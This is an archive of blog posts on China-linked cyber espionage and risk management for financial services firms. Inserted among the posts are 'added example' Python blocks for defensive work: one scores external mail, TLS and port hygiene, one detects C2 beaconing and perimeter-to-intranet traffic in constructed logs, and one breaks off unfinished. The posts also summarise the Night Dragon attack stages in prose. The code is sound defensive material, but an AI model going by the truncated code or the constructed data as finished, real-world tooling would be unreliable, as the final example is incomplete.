Pirated Software and Network Segmentation

July 17, 2017

Global financial services enterprises face a complex web of risk management challenges.
Sometimes finding the right grain for security controls can be a difficult problem.
This can be especially problematic when there is a tendency to attribute specific risks to cultures or nations.

A couple of months ago I read a short article on how WannaCry ransomware impacted organizations in China. Recently, while responding to a question about data communications connectivity and segmenting enterprise networks, I used some of the factoids in this article. While some propose material “savings” and “agility” enabled by uninhibited workforce communications and sharing, the global financial services marketplace imposes the need for rational/rationalized risk management and some level of due diligence evidence. Paul Mozur provides a brief vignette about some of the risks associated with what seems like China’s dependence on pirated software. Mr. Mozur argues that unlicensed Windows software is not being patched, so the vulnerability ecosystem in China is much richer for attackers than is found in societies where software piracy is less pronounced. Because of the scale of the issue, this seems like a valid nation-specific risk — one that might add some context to some individuals’ urges to enforce China-specific data communications controls.

Again, there is no perfect approach to identifying security controls at the right grain. Story-telling about risks works best with real and relevant fact-sets. This little article may help flesh out one facet of the risks associated with more-open, rather than more segmented data communications networks.

“China, Addicted to Bootleg Software, Reels From Ransomware Attack.”

FBI Director James Comey on Some China Risks

October 5, 2014

For a variety of reasons, it is often a challenge to generate the appropriate level of information security awareness in executive leadership.
For some this has been especially true when the issues are associated with nation-state actors or a given culture.

For enterprises extending their operations into China, it may be difficult to build an effective risk-management message in the face of the virtually-intoxicating potential for growth and profit.

In that context, a recent interview with FBI Director James Comey included some unambiguous statements that might be helpful in framing some of the risks of integrating or extending your Financial Services operations into China. The interview was aired on the October 5, 2014 episode of 60 Minutes.

Scott Pelley: What countries are attacking the United States as we sit here in cyberspace?

James Comey: Well, I don’t want to give you a complete list. But I can tell you the top of the list is the Chinese. As we have demonstrated with the charges we brought earlier this year against five members of the People’s Liberation Army. They are extremely aggressive and widespread in their efforts to break into American systems to steal information that would benefit their industry.

Scott Pelley: What are they trying to get?

James Comey: Information that’s useful to them so they don’t have to invent. They can copy or steal so learn about how a company might approach negotiation with a Chinese company, all manner of things.

Scott Pelley: How many hits from China do we take in a day?

James Comey: Many, many, many. I mean, there are two kinds of big companies in the United States. There are those who’ve been hacked by the Chinese and those who don’t know they’ve been hacked by the Chinese.

Scott Pelley: The Chinese are that good?

James Comey: Actually, not that good. I liken them a bit to a drunk burglar. They’re kicking in the front door, knocking over the vase, while they’re walking out with your television set. They’re just prolific. Their strategy seems to be: We’ll just be everywhere all the time. And there’s no way they can stop us.

Scott Pelley: How much does that cost the U.S. economy every year?

James Comey: Impossible to count. Billions.

The entire transcript is available at:


Third-Party Security Assessments – We Need a Better Way

July 6, 2014

“According to a February 2013 Ponemon Institute survey, 65% of organizations transferring consumer data to third-party vendors reported a breach involving the loss or theft of their information. In addition, nearly half of organizations surveyed did not evaluate their partners before sharing sensitive data.” [DarkReading]

Assessing the risks associated with extending Financial Services operations into vendor/partner environments is a challenge.  It often results in less-than-crisp indicators of more or less risk.  Identifying, measuring, and dealing with these risks with a risk-relevant level of objectivity is generally not cheap and often takes time — and sometimes it is just not practical using our traditional approaches.  Some approaches also only attempt to deal with a single point-in-time, which ignores the velocity of business and technical change.

There are a number of talented security assessment companies that offer specialized talent, experience, and localized access virtually world-wide.  The challenge is less about available talent, but of time/delay, expense, and risks that are sometimes associated with revealing your interest in any given target(s).

There are also organizations which attempt to replace a repetitive, labor-intensive process with a non-repetitive, labor-saving approach that may reduce operational expenses and may also support some amount of staff redeployment.  The Financial Services Round Table/BITS has worked toward this goal for over a decade.  Their guidance is invaluable.  For those in the “sharing” club, it appears to work well when applied to a range of established vendor types.  It is also, though, a difficult fit for many situations where the candidate vendor/partners are all relatively new (some still living on venture capital) and are still undergoing rapid evolution.  Some types of niche, cloud-based specialty service providers fall easily into this category.  The incentive to invest in a “BITS compliant” assessment for these types of targets seems small, and any assessment’s lasting value seems equally small.

Some challenges are enhanced by increasing globalization – for example, how do we evaluate the risks associated with a candidate vendor that has technical and infrastructure administrative support personnel spread across Brazil, Costa Rica, U.S. East & West coasts, Viet Nam, China, India, Georgia, Germany, and Ireland?  Culture still matters.  What a hassle…

None of that alters the fact that as global financial services organizations we have obligations to many of our stakeholders to effectively manage the risks associated with extending our operations into vendor’s environments and building business partnerships.

When the stakes are material – for example during merger or acquisition research – it is easy to understand the importance of investing in an understanding of existing and candidate third-party risks.  There are many other situations where it seems “easy” to understand that a third party security assessment is mandated.  Unfortunately, not all use cases seem so universally clear-cut.

When we are attempting to evaluate platform or vendor opportunities, especially when in the early stages of doing so, the time and expense associated with traditional approaches to full-bore third-party risk assessments are a mismatch.  Performing third-party risk assessments in-house can also reveal sensitive tactical or strategic planning which can negatively impact existing relationships, add unnecessary complexity to negotiations, or, in edge cases, even disrupt relationships with key regulators.  As an industry, we have got to get better at quick-turn-around third-party risk assessments that are “good-enough” for many types of financial services decision-making.

For years, “technicians” have been evaluating Internet-facing infrastructure for signals of effective technology-centric risk management practices – or for their absence.  Poorly configured or vulnerable email or DNS infrastructure, open SNMP services, “external” exposure of “internal” administrative interfaces, SSL configurations, public announcements of breaches, and more have been used by many in their attempts to read “signals” of stronger or weaker risk management practices.  A colleague just introduced me to a company that uses “externally-observable” data to infer how diligent a target organization is in mitigating technology-associated risks.  Based on a quick scan of their site, they tell a good story.*  I am interested in learning about anyone’s experience with this, or this type of service.

*I have no relationships with BitsightTech, financial or otherwise.
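The paragraph above lists the kinds of externally observable signals (mail and DNS hygiene, exposed administrative interfaces, SSL configuration) that have long been read as proxies for a third party’s risk management practices. The following is an added example, not code from this blog or from BitSight or any other rating service, of how a quick-turn-around review might score such signals once they have been collected. Every input (the domain names, TXT records, TLS versions and open ports) is constructed for the example; the check functions, the severity labels and the port list are my own assumptions, and real data would be gathered with dig, openssl or a scanner against infrastructure you are authorised to assess.

```python
"""Added example: scoring a few externally observable hygiene signals.

All inputs below are constructed. In practice they would be gathered with
tools such as dig and openssl against infrastructure you are authorised
to assess; no real rating service's method is shown here.
"""
import re
from dataclasses import dataclass


@dataclass
class ExternalObservation:
    domain: str
    txt_records: list   # TXT records published at the domain apex
    dmarc_txt: list     # TXT records published at _dmarc.<domain>
    tls_versions: set   # protocol versions the HTTPS endpoint accepts
    open_ports: set     # ports reachable from the Internet


SAFE_TLS = {"TLSv1.2", "TLSv1.3"}
# Assumed list of management services that should not be Internet-facing.
ADMIN_PORTS = {22: "SSH", 23: "Telnet", 161: "SNMP", 3389: "RDP", 5900: "VNC"}


def check_spf(txt_records):
    """SPF signal: missing, duplicated, or ending in a qualifier that rejects nothing."""
    spf = [r for r in txt_records if r.lower().startswith("v=spf1")]
    if not spf:
        return [("high", "no SPF record published")]
    if len(spf) > 1:
        return [("high", "multiple SPF records; receivers treat this as a permanent error")]
    all_tok = next((t for t in spf[0].split()
                    if re.fullmatch(r"[+\-~?]?all", t, re.IGNORECASE)), None)
    if all_tok is None:
        return [("medium", "SPF record has no terminal 'all' mechanism")]
    qualifier = all_tok[0] if all_tok[0] in "+-~?" else "+"
    if qualifier in "+?":
        return [("high", f"SPF ends with '{qualifier}all', which rejects nothing")]
    return []


def check_dmarc(dmarc_txt):
    """DMARC signal: missing, or published with a non-enforcing policy."""
    dmarc = [r for r in dmarc_txt if r.lower().startswith("v=dmarc1")]
    if not dmarc:
        return [("high", "no DMARC record published")]
    tags = {}
    for kv in dmarc[0].split(";"):
        if "=" in kv:
            key, value = kv.split("=", 1)
            tags[key.strip().lower()] = value.strip()
    policy = tags.get("p", "").lower()
    if policy not in ("quarantine", "reject"):
        return [("medium", f"DMARC policy is '{policy or 'missing'}', so it is not enforcing")]
    return []


def evaluate(obs):
    """Return (severity, message) findings for one observation set; empty means no signal."""
    findings = check_spf(obs.txt_records) + check_dmarc(obs.dmarc_txt)
    weak = obs.tls_versions - SAFE_TLS
    if weak:
        findings.append(("medium", "TLS endpoint accepts " + ", ".join(sorted(weak))))
    for port in sorted(obs.open_ports & set(ADMIN_PORTS)):
        findings.append(("high", f"{ADMIN_PORTS[port]} (port {port}) reachable from the Internet"))
    return findings


def severity_counts(findings):
    """Summarise findings as {'high': n, 'medium': m}."""
    counts = {"high": 0, "medium": 0}
    for severity, _ in findings:
        counts[severity] += 1
    return counts


# Constructed observations for two hypothetical domains.
GOOD = ExternalObservation(
    domain="good.example",
    txt_records=["v=spf1 include:_spf.good.example -all", "site-verification=abc123"],
    dmarc_txt=["v=DMARC1; p=reject; rua=mailto:dmarc@good.example"],
    tls_versions={"TLSv1.2", "TLSv1.3"},
    open_ports={25, 443},
)
WEAK = ExternalObservation(
    domain="weak.example",
    txt_records=["v=spf1 ip4:198.51.100.0/24 ?all"],
    dmarc_txt=[],
    tls_versions={"TLSv1.0", "TLSv1.2"},
    open_ports={443, 161, 3389},
)

if __name__ == "__main__":
    for obs in (GOOD, WEAK):
        print(obs.domain, severity_counts(evaluate(obs)))
        for severity, message in evaluate(obs):
            print("  ", severity, message)
```

The point of the split into small check functions is that each signal stays explainable to a business decision-maker: a “high” finding can be traced to one observable fact, which is what a “good-enough” quick assessment needs to be credible.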



“BitSight Technologies Launches Information Security Risk Rating Service.” 9/10/2013

“Bits Framework For Managing Technology Risk For Service Provider Relationships.” November 2003 Revised In Part February 2010.

Shared Assessments.

The company a colleague mentioned to me…

Infrastructure and Integration, Culture Matters

December 17, 2013

A recent 60 Minutes episode highlighted an NSA staffer describing a Chinese plot to “take down” the U.S. financial system using social engineering & a firmware update to brick the computers that support all economic activity.  The story received a lot of unflattering attention (Google it).  The broader piece about recent NSA data-gathering and spying also seemed less like news than an advertisement.  This has resulted in a lot of attention on the nature of the story and the likelihood that there is material distance between the themes highlighted by the CBS report and the behaviors of NSA staff and leadership.  So, why should we care?

There are many reasons.  One assumes that many in our industry receive “news” via feeds & tweets — which must radically distill stories down to a very few words.  Many senior decision-makers “grew up” with news shows like 60 Minutes and have sensors tuned to content from its brand.  So, that channel can deliver messages to financial services leaders in ways many others can’t.

Later in the December 15th 60 Minutes broadcast was a report about the Chinese telecommunications equipment giant “Huawei.”  It could have been a useful reminder that infrastructure matters in global Financial Services risk management.  Global data communications networking makes decision-making about ‘inside’ & ‘outside’ and what or whom to trust much more complex and challenging.  Culture matters.  Nation-state behaviors matter.  The scale and scope of Financial Services operations make it an attractive target for intellectual property theft.  We all need to continue to enhance our understanding of threats associated with infrastructure purchasing and integration, as well as with extending our operations using partners and massive shared ‘cloud’ infrastructure.


“Update on Huawei.” Dec. 15, 2013 http://www.cbsnews.com/videos/update-on-huawei/

“Chinese telecom giant eyed as security threat.” Oct. 05, 2012, http://www.cbsnews.com/news/chinese-telecom-giant-eyed-as-security-threat/


Symantec Report Highlights Hidden Lynx Threat to Financial Services Enterprises

September 25, 2013

Last week researchers at security vendor Symantec released a whitepaper attempting to describe the nature and activities of a group of advanced, professional attackers working out of China, dubbed the Hidden Lynx team.

They report that Hidden Lynx offers a ‘hackers for hire’ operation that has stayed busy the last four years stealing specific information from a wide range of corporate targets.  Symantec says that Hidden Lynx activities display skill-sets far above some other attack groups also operating out of China — for example the Comment Crew (aka APT1) — and adds that they are “breaking into some of the best-protected organizations in the world.”

Hidden Lynx has targeted hundreds of organizations worldwide since November 2011.  Financial services organizations (not commercial banks) have been the vertical targeted most often by this group, amounting to almost 25% of the top 10 targeted industries.  In that same period, they also hit targets in the United States almost 53% of the time.

Symantec’s analysis suggests that Hidden Lynx is “tasked with obtaining very specific information that could be used to gain competitive advantages… It is unlikely that this organization engages in processing or using the stolen information for direct financial gain.”

When Symantec looked at Hidden Lynx’s large scale attacks, the focus on Financial Services increased, amounting to 30% of their attacks.

The key conclusion offered by Symantec is that “cyber-espionage campaigns are becoming increasingly common,” and that “these attacks are becoming increasingly sophisticated.”

We can take steps to help resist attacks like those by Hidden Lynx, keeping valuable information from falling into their hands. The key is to take those steps! Work with your information security consultants.  Protect all endpoints, yours included, from malware.  Use ‘safe’ web filtering services. Train your workforce to resist social engineering through all communications channels, including your browser.  Incorporate secure software practices into all of your business application investments.  Insist on secure infrastructure configurations and practices.


“Hidden Lynx – Professional Hackers for Hire.”
By Stephen Doherty, Jozsef Gegeny, Branko Spasojevic, and Jonell Baltazar.
Version 1.0 – Sept 17, 2013

“Hidden Lynx – Professional Hackers for Hire.”
17 Sept 2013

“Hidden Lynx and MSS protection.”
18 Sept 2013

China Cyber-Threat Again Highlighted

February 19, 2013

Responding to the buzz generated by the release of a new evidence-rich report on China’s cyber threat actors by Mandiant, a pair of articles today again point out China-sourced cyber-threats to businesses.  Financial services is a global enterprise.  Virtually all financial services organizations are attempting to enter China markets and are pursuing investments in China in order to better diversify their portfolios and offer their customers opportunities throughout Asia.

The report by Mandiant and signals from the U.S. government remind us again that it is important to resist the types of attacks that seem to continue out of China.  Mandiant documented that the China-based hostile actors have systematically stolen hundreds of terabytes of data from at least 141 organizations.  The White House specifically highlighted that this threat was directed against Financial Services organizations, among others.

Writers at The Washington Post said that the recent “Mandiant report echoed a classified National Intelligence Estimate by the U.S. intelligence community that concluded that China was the most aggressive perpetrator of a massive campaign of cyber-espionage against commercial targets in the United States.”

Writers in the Wall Street Journal added that:

“U.S. officials said the allegations in the Mandiant report come as no surprise and build on other evidence of cyber infiltration.

A 2011 intelligence report publicly accused China of a role in cyberattacks. More recently, a U.S. assessment known as a National Intelligence Estimate, which remains classified and hasn’t been released, cited the Chinese government as being behind pervasive cyberthefts resulting in the loss of intellectual property, according to people who have read it.”

Bringing value to China appears to come at a material risk.  Can you afford to lose your risk models?  Your fraud analysis engines? Your portfolio management tooling?  Your investing strategies?  We all have material investments in highly-portable intellectual property.  Protect it from known threats as a demonstration of threshold due diligence.

At a minimum, ensure that you have employed the full spectrum of threat-resisting technology and process that is already in hand in every financial services organization. Ensure that your protective layers overlap and compensate for each other, and do so throughout your infrastructure, not just at the Internet edge. Plan for and fund enhancement of your detective, preventative, corrective, and compensating control capabilities — as the issue of persistent “world-class” state-sponsored hostile actors appears to be with us for the foreseeable future.


“Mandiant Intelligence Center Report — APT1: Exposing One of China’s Cyber Espionage Units.”

“Report ties cyberattacks on U.S. computers to Chinese military.”
By William Wan and Ellen Nakashima; 02-19-2013

“U.S., China Ties Tested in Cyberspace.”
By JULIAN E. BARNES and SIOBHAN GORMAN in Washington and JEREMY PAGE in Beijing; 02-19-2013

Updated to include the following reference on 04-15-2013:
“contextChina’s Guide to Understanding Recent News on Chinese Hackers.”
By  , 02-22-2013

Risks Are High For Extending Financial Services into China

February 18, 2012

The economic trajectory of 1.3 billion Chinese has Western financial services leadership giddy.  They project oceans of profits generated through services to China’s growing middle class and wealthy elites.  Shareholders read about our corporations’ efforts to plumb critical hubs of their global operations into Chinese joint ventures, and seem to support leaders’ optimism.  In the rush for earnings, systems are rapidly being integrated across virtually all lines of personal and corporate finance.

In many situations, this vision seems out of phase with guidance from seasoned financial services security and risk management professionals.  All material players in global financial services distinguish their organizations from the competition through their market reach and human capital.  Some also tout the value of their brand or their access to non-human capital.  But a key differentiator remains proprietary business rules, investments analysis and operations platforms, and data.  These foundational assets exist in highly-portable digital form and cannot be replaced or easily re-factored if they are stolen.  It is already difficult and expensive to resist targeted cyber-attacks, many of which emanate from China.  Casually extending financial services infrastructure into China is an elevated risk gamble — of a magnitude rarely undertaken even by the most aggressive of our peers.  Plan to lose some of these bets as core intellectual property and data are appropriated into our Chinese competitor’s operations.

This should not be new news…

After years of reticence to engage the issue, it seems like the U.S. government is now changing course and attempting to help engage U.S. businesses in efforts to more effectively address some of the risks associated with Chinese cyber-threats.  Last fall House Intelligence Chairman Mike Rogers (R-MI) accused China of widespread cyber economic espionage.  Chairman Rogers said, “China’s economic espionage has reached an intolerable level…”

Late last month three individuals in positions to have extensive, long-running access to secret intelligence concerning cyber-threats against United States targets released an opinion column in the Wall Street Journal titled: “China’s Cyber Thievery Is National Policy—And Must Be Challenged.”  The piece was written by Mike McConnell (Director of the National Security Agency 1992-1996, and Director of National Intelligence 2007-2009), Michael Chertoff (Secretary of Homeland Security from 2005-2009), and William Lynn (Deputy Secretary of Defense 2009-2011).  Their central message was that “The Chinese government has a national policy of economic espionage in cyberspace. In fact, the Chinese are the world’s most active and persistent practitioners of cyber espionage today.”

Reporting on the topic, NPR’s Tom Gjelten quoted Mike McConnell: “We know, and there’s good evidence … of very deliberate, focused cyber espionage to capture very valuable research and development information, or innovative ideas, or source code or business plans for their own advantage.”  Writing about the WSJ column on the topic, Gjelten went on to write that “One reason they were anxious to publicize China’s cyber espionage was to counter those who claimed there was little concrete evidence to link the Chinese definitively to major hacking activity.”

Attackers from China have been conducting sustained, coordinated, covert intellectual property and sensitive financial information thefts against corporations, in some cases for years.  There are powerful forces influencing the dialog on this topic.  With few exceptions, representatives of companies doing business in China seem to have a pattern of stumbling whenever asked to discuss this topic in public.  As leaders in global financial services organizations intensify their focus on extracting value from Chinese markets, we need to ensure that sufficient fact-based risk management influence is applied to technology, infrastructure, operations, and information security decision-making.

“US lawmaker: China cyber espionage ‘intolerable.’”
October 4, 2011, Susan Cornwell, Reuters.

“China’s Cyber Thievery Is National Policy—And Must Be Challenged.”
January 27th, 2012, Wall Street Journal.

“U.S. Not Afraid To Say It: China’s The Cyber Bad Guy.”
February 18, by Tom Gjelten, National Public Radio

“Night Dragon” — The New ‘More of the Same’?

February 27, 2011

A Wall Street Journal story reported earlier this month that attackers from China have been conducting sustained, coordinated, covert intellectual property and sensitive financial information thefts against energy corporations, in some cases for years.  They relayed that these “cyberattacks successfully took gigabytes of highly sensitive internal documents.”

The WSJ piece includes a “cyber warfare” spin on this activity.  Exploring Google Trends and informally monitoring the security and technical press both suggest that hyping issues with references to “cyber warfare” or “cyber war” has been on the rise in some channels.  There seem to be many motivations for that hype.  In financial services, it is more productive to focus on the specific families of Internet-enabled criminal activity that are targeting global business (financial services, in my case) than to link communications about that activity with the broader, multi-purpose “cyber warfare” moniker.

McAfee named these attacks “Night Dragon” in a recently-published report.

McAfee announced that they have “identified a string of attacks designed to steal sensitive data from targeted organizations” by perpetrators that “appear to be sophisticated, highly organized, and motivated in their pursuits.”  McAfee emphasized that these were not opportunists, preying on some shared industry weakness…  They say that the attacks could have been running for the last four years, but started no later than November 2009 and that individual company losses were in the many millions of dollars. (pages 3 & 7)

In that report they argued that these attacks were part of a broader trend where “adversaries are rapidly leveraging productized malware toolkits that let them develop more malware than in all prior years combined, and they have matured from the prior decade to release the most insidious and persistent cyberthreats ever known.” (page 3)

McAfee outlined the stages of “Night Dragon” attacks as:

  • Compromised extranet webservers via SQL injection and remote command execution, as well as targeted spear-phishing.
  • Uploaded hacker tools to these more “trusted” servers to attack each company’s intranet, desktops, and servers.
  • Gained access to sensitive non-public information from internal desktops and servers.
  • Accessed additional usernames and passwords to broaden their access to sensitive information.
  • Used compromised perimeter web servers as command and control platforms for the company-internal desktops and servers.  They later enabled direct communication from infected internal machines to external command and control infrastructure on the Internet.
  • Used remote administration tools to explore other internal hosts, targeting executives.
  • Exfiltrated gigabytes of email archives and other sensitive documents from executives’ compromised computers.
    (page 4)

McAfee points out that in global corporations, the attacker’s hunt for internal points of “weakness” is also global.  In this case, “Night Dragon” attackers persisted until finding a critical mass of their targeted information.  Proprietary and highly confidential information was stolen from individuals and executives in Kazakhstan, Taiwan, Greece, as well as the United States. (page 4)

McAfee concludes that “While Night Dragon attacks focused specifically on the energy sector, the tools and techniques of this kind can be highly successful when targeting any industry.”  Those of us in financial services should not assume that these attackers only care about oil…

The report is a good read, and if you have not had the opportunity to review it, you should.

The report also spurred some interesting follow-on reporting:

McAfee said that the Night Dragon attackers stole proprietary information from the networks of Exxon Mobil Corp., Royal Dutch Shell Plc and BP Plc.  Michael Riley wrote for Bloomberg that sources told him Marathon Oil, ConocoPhillips and Baker Hughes were successfully targeted as well.  He highlighted opinions supporting the notion that the Chinese government is involved in this activity as part of their efforts to support a “massive economic leap forward.”  He went on to argue that “The thefts might trigger legal liability for companies that chose not to disclose them to investors.”  In the United States, investors expect that “material” corporate facts will be disclosed in a timely manner.  They also expect that corporations will implement adequate technology and procedures to protect their “crown jewels.”

Phil Muncaster outlined the McAfee report for V3, restating that “The attacks used methodical but far from sophisticated hacking techniques, including SQL injection, password hacking and remote access Trojans.”  He advised that “Companies suspecting that they may have been targeted are urged to look through anti-virus and network traffic logs” — the McAfee report offers some assistance concerning what to look for.  Unless your infrastructure is designed to retain, maybe even normalize, these logs, a multi-year historical investigation of host and network activity might not be a practical matter…
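Two of the stages in McAfee’s outline leave footprints that ordinary firewall and proxy logs record: a perimeter web server opening connections inward (stage 2) and an infected desktop talking to external command and control at steady intervals (stage 5). The block below is an added example, not the McAfee report’s indicators and not the blog author’s code, of the “retain, maybe even normalize” point in the paragraph above: it maps two constructed log formats into one event tuple and then runs both detections over them. The network ranges, the log formats, every log line and the jitter threshold are assumptions made for the example.

```python
"""Added example: normalising two constructed log formats and running two
detections motivated by the Night Dragon stages listed above.

Network ranges, log formats and every log line are constructed; they are
not McAfee's indicators and not any vendor's real format.
"""
import ipaddress
import re
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

DMZ = ipaddress.ip_network("203.0.113.0/24")    # assumed: perimeter web servers
INTERNAL = ipaddress.ip_network("10.0.0.0/8")   # assumed: desktops and internal servers

# Two constructed formats: a firewall CSV and a web proxy access log.
FW_RE = re.compile(
    r"^(?P<ts>[\d-]+ [\d:]+),(?P<src>[\d.]+),(?P<dst>[\d.]+),(?P<port>\d+),(?P<action>\w+)$")
PROXY_RE = re.compile(
    r"^(?P<ts>[\d-]+ [\d:]+) (?P<src>[\d.]+) -> (?P<dst>[\d.]+):(?P<port>\d+) \w+$")


def normalize(line):
    """Map a line in either format to (datetime, src, dst, port); None if unparseable or denied."""
    m = FW_RE.match(line) or PROXY_RE.match(line)
    if not m or m.groupdict().get("action") == "deny":
        return None
    ts = datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S")
    return ts, ipaddress.ip_address(m["src"]), ipaddress.ip_address(m["dst"]), int(m["port"])


def dmz_to_internal(events):
    """Stage 2 signal: a perimeter server opening connections into the intranet."""
    return sorted({(str(s), str(d), p) for _, s, d, p in events if s in DMZ and d in INTERNAL})


def beacons(events, min_count=4, max_jitter=0.2):
    """Stage 5 signal: an internal host contacting one external address at steady intervals."""
    by_pair = defaultdict(list)
    for ts, s, d, _ in events:
        if s in INTERNAL and d not in INTERNAL and d not in DMZ:
            by_pair[(str(s), str(d))].append(ts)
    hits = []
    for (src, dst), times in by_pair.items():
        if len(times) < min_count:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        avg = mean(gaps)
        # Low relative jitter between successive connections is the beaconing signature.
        if avg > 0 and pstdev(gaps) / avg <= max_jitter:
            hits.append((src, dst, round(avg)))
    return hits


def analyse(lines):
    """Normalise a batch of mixed-format lines and return both detections."""
    events = [e for e in map(normalize, lines) if e is not None]
    return {"dmz_to_internal": dmz_to_internal(events), "beacons": beacons(events)}


# Constructed sample: one DMZ server reaching a desktop, one desktop beaconing
# every five minutes, one desktop browsing irregularly, plus noise.
SAMPLE_LOG = """\
2011-02-10 09:00:00,10.1.2.5,203.0.113.10,443,allow
2011-02-10 09:00:00 10.1.2.3 -> 198.51.100.7:443 GET
2011-02-10 09:00:10,203.0.113.10,10.1.2.3,445,allow
2011-02-10 09:01:00 10.1.2.4 -> 198.51.100.9:443 GET
2011-02-10 09:02:00 10.1.2.4 -> 198.51.100.9:443 GET
2011-02-10 09:05:00 10.1.2.3 -> 198.51.100.7:443 GET
2011-02-10 09:10:01 10.1.2.3 -> 198.51.100.7:443 GET
2011-02-10 09:14:59 10.1.2.3 -> 198.51.100.7:443 GET
2011-02-10 09:20:00 10.1.2.3 -> 198.51.100.7:443 GET
2011-02-10 09:30:00 10.1.2.4 -> 198.51.100.9:443 GET
2011-02-10 09:31:00 10.1.2.4 -> 198.51.100.9:443 GET
2011-02-10 09:40:00,203.0.113.10,10.1.2.9,445,deny
this line is noise and does not parse
""".splitlines()

if __name__ == "__main__":
    for name, result in analyse(SAMPLE_LOG).items():
        print(name, result)
```

Neither detection is possible unless the logs from both sources were kept for the whole window and carry comparable timestamps and address fields, which is the practical point Muncaster’s advice runs into for a multi-year lookback.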

Fraser Howard of SophosLabs highlighted that the McAfee report “emphasizes the persistent and coordinated attacks of organized groups against specific organizations, with the goal of extracting sensitive data.”  He argues that risk management professionals, as well as all corporate leaders, need to understand that “Night Dragon” was not special, rather that it is only an illustration of the Internet-enabled criminal menace that all organizations face today.

Fraser Howard’s argument about the new normal might be the most important message we can take from the McAfee report.  What do you think?

– References –

“Oil Firms Hit by Hackers From China, Report Says.” By Nathan Hodge & Adam Entous, 02-10-2011

“Global Energy Cyberattacks: ‘Night Dragon’” By McAfee® Foundstone® Professional Services and McAfee Labs™, February 10, 2011.
http://www.mcafee.com/us/resources/white-papers/wp-global-energy-cyberattacks-night-dragon.pdf And “Night Dragon.” http://www.mcafee.com/mx/about/night-dragon.aspx

“Exxon, Shell, BP Said to Have Been Hacked Through Chinese Internet Servers.” By Michael Riley – Feb 24, 2011

“Hackers Breach Tech Systems of Oil Companies.” By John Markoff, 02-10-2011.

“Night Dragon hackers targeted Shell, BP and Exxon — IT security at global petrochemical firms called into question.” By Phil Muncaster, 02-24-2011

“Night Dragon attacks: myth or reality?” by Fraser Howard, 02-11-2011

“Schwartz On Security: Unraveling Night Dragon Attacks.” By Mathew J. Schwartz, 02-17-2011.

Google Trends.
According to a Google Trends search performed on Feb 27, 2011, material amounts of searches for “cyber warfare” began mid-2009.  There had been a small amount of noise in the news starting in 2001.  Pakistan generated more than twice the number of searches for “cyber warfare” than any of Singapore, India, or the United States, the next three highest, in that order.  That said, Washington, DC, USA, is the city that has generated the largest number of searches for “cyber warfare.”
Google searches and news references to “cyber war” follow a curve similar to that of “cyber warfare,” except that Pakistan no longer leads in searches, Singapore taking over that spot.

“Cyberwarfare Called Fifth Domain of Battle by Pentagon.” By Paul Wagenseil, Feb 16, 2011

Chinese Cyberspying and Intellectual Property Theft

October 23, 2009
New “Cyber Warfare” Report Includes Information on Chinese Cyberspying and Intellectual Property Theft.

Siobhan Gorman of the Wall Street Journal put the recently released “US-China Economic and Security Review Commission Report” in context for corporate organizations:

“Attacks like that cited in the report hew closely to a blueprint frequently used by Chinese cyberspies, who in total steal $40 billion to $50 billion in intellectual property from U.S. organizations each year, according to U.S. intelligence agency estimates provided by a person familiar with them.”

“Modern-day espionage doesn’t involve cloak and dagger anymore,” said Tom Kellermann, a vice president at Core Security Technologies, a cybersecurity company. “It’s all electronic.”

China is among more than 100 countries that have the capability to conduct cyberspying operations.

Gorman went on to highlight an incident in 2007 where Chinese:

“…cyberspies did extensive reconnaissance, identifying which employee computer accounts they wanted to hijack and which files they wanted to steal. They obtained credentials for dozens of employee accounts, which they accessed nearly 150 times.

The cyberspies then reached into the company’s networks using the same type of program help-desk administrators use to remotely access computers.”
The 88-page report is not directly aimed at financial services security professionals, but it provides what appears to be credible information about Chinese cyber-attack capabilities and activities.  It points out that China is not alone in its efforts to build and exercise cyber-attack capabilities — this is not only a “China” issue.  The findings in this report, though, should be considered as we continue updating our risk management plans, especially as we host more of our business in China or in partnership with Chinese operations.
From the report:
“The PLA is reaching out across a wide swath of Chinese civilian sector to meet the intensive personnel requirements necessary to support its burgeoning IW capabilities, incorporating people with specialized skills from commercial industry, academia, and possibly select elements of China’s hacker community.”
“China is likely using its maturing computer network exploitation capability to support intelligence collection against the US Government and industry by conducting a long term, sophisticated, computer network exploitation campaign. The problem is characterized by disciplined, standardized operations, sophisticated techniques, access to high-end software development resources, a deep knowledge of the targeted networks, and an ability to sustain activities inside targeted networks, sometimes over a period of months.”
There is “increasing evidence that the intruders are turning to Chinese “black hat” programmers (i.e. individuals who support illegal hacking activities) for customized tools that exploit vulnerabilities in software that vendors have not yet discovered.”
It is an interesting read.  How can we get a read on Chinese culture as it pertains to our risk management analysis?  How will this figure into your risk management planning as your corporation expands its operations into China?  How will this figure into your risk management planning as Chinese businesses expand their operations into your market or even your corporation?
“China Expands Cyberspying in U.S., Report Says.” By Siobhan Gorman, Wall Street Journal, OCTOBER 23, 2009  http://online.wsj.com/article/SB125616872684400273.html.
“US-China Economic and Security Review Commission Report on the Capability of the People’s Republic of China to Conduct Cyber Warfare and Computer Network Exploitation.” By Principal Author Bryan Krekel, and Subject Matter Experts George Bakos and Christopher Barnett.  October 9, 2009  http://china.usc.edu/App_Images//us-china-cyberwar-report-2009.pdf or
Announcement by the USC US-China Institute:  http://china.usc.edu/(A(ayGc7PuyygEkAAAAMGJiMjY0M2QtY2NmYi00ODlkLWEyZTctMzEzMDUzOGQ5MWZm-MWsGZGDymlexh-7e8Rwxq6s3401)S(bof1mn2ijuzcks3tmakvrx45))/ShowArticle.aspx?articleID=1862.

Social Networks are a Global Malicious Code Channel

March 4, 2009

If you are not familiar with the user-base in the social networking sites identified in my last post, you might think that all of them retain a North American focus, and then that this might be a North American problem.  It isn’t.  For example, two recent reports by Finjan identify analogous problems on the livedoor.jp and yaplog.jp social networking sites.  Both systems were infected via malicious iFrames and ActiveX applications designed to take advantage of a range of Windows vulnerabilities and then compromise the local environment and download additional malicious code, including a trojan that steals the user’s credentials.

The Finjan team does a good job outlining their position concerning a key risk of Web2.0 — that is “giving users the power to add code also gives them the power to add malicious code.”  Finjan promotes real-time content inspection.  That approach may buy time, but comprehensive and effective input validation and output encoding still seem like the only approach that will ultimately be successful.
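The paragraph above contrasts real-time content inspection with input validation and output encoding. As an added example, not code from Finjan or from either of the sites named, the block below shows the server-side half of that argument: the same user-submitted comment rendered the Web 2.0 way (dropped straight into the page, so an injected hidden frame survives) and rendered with validation plus output encoding (so the frame markup becomes inert text). The post content, the frame source, the length limit and all helper names are constructed assumptions for this example.

```python
"""Added example: input validation and output encoding for user-supplied
content, beside the unencoded rendering that lets injected markup through.

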